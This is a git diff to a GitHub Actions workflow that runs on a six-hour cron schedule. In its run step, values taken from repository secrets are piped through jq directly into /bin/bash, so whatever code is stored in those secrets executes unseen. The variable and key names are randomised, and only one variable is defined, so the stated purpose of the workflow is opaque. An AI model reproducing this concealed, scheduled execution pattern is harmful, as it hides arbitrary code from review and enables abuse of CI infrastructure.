--- a/.github/workflows/wangtesi6128.yml
+++ b/.github/workflows/wangtesi6128.yml
@@ -1,9 +1,9 @@
 name: wangtesi6128
+
 on:
   workflow_dispatch:
   schedule:
-    - cron: '30 0/6 * * *'
-
+    - cron: '51 1/6 * * *'
 jobs:
   build:
     runs-on: ubuntu-latest
@@ -12,15 +12,16 @@ jobs:
       - uses: actions/checkout@v4
       - name: wangtesi6128
         env:
-          a8007: ${{ secrets.a8007 }}
+          tnrc435: ${{ secrets.tnrc435 }}
         run: |
-          echo $a8007 | jq -r .nimm001 | /bin/bash
-          echo $cqet869 | jq -r .x556 | /bin/bash
-          echo $a4 | jq -r .sdby02426 | /bin/bash
-          echo $hrgc02 | jq -r .sre9 | /bin/bash
-          echo $bjm58801 | jq -r .db8 | /bin/bash
-          echo $bx8 | jq -r .qiw08 | /bin/bash
-          echo $hze93966 | jq -r .nq362 | /bin/bash
-          echo $ve5 | jq -r .nznpr3869 | /bin/bash
-          echo $izhid864 | jq -r .ud3 | /bin/bash
+          echo $tnrc435 | jq -r .kqjvm0928 | /bin/bash
+          echo $wv971 | jq -r .t5 | /bin/bash
+          echo $ylwnf97 | jq -r .d16 | /bin/bash
+          echo $pj01 | jq -r .va3 | /bin/bash
+          echo $ec47 | jq -r .cal0111 | /bin/bash
+          echo $wjpzy96731 | jq -r .xtfx503 | /bin/bash
+          echo $as02985 | jq -r .rqa7801 | /bin/bash
+          echo $xvrz099 | jq -r .zxie40074 | /bin/bash
+          echo $sj51225 | jq -r .n62 | /bin/bash
+          echo $hdgny26618 | jq -r .rqgz00701 | /bin/bash
 
